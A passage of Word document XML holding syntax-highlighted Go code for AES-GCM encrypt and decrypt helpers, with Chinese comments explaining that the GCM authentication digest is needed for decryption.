          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>) []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">byte </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>{</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t>cipher_key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">_ := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>DecodeString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(hex_cipher_key)</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t>cipher_iv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">_ := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>DecodeString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(hex_iv)</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lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>block</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">_ := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>aes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewCipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(cipher_key)</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t>aesGCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">_ := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewGCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(block)</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t>ciphertext := aesGCM.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Seal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">nil, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cipher_iv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>plainBytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>提取密文部分，返回纯密文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>生成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ciphertext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>默认直接拼接了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>aesGCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>加密的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>digest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>部分（有认证功能），此处不想携带</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>digest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>部分，故切割出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> encryptedData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>GCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>解密时，必须有认证部分，因此建议密文无需切割</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>digest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//encryptedData := ciphertext[:len(ciphertext)-aesGCM.Overhead()]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ciphertext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>}</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>DecryptGCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(cipherBytes []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>) []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">byte </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>{</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>解密函数必须传入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>加密时的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>digest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>用作认证，否则直接报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cipher_key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
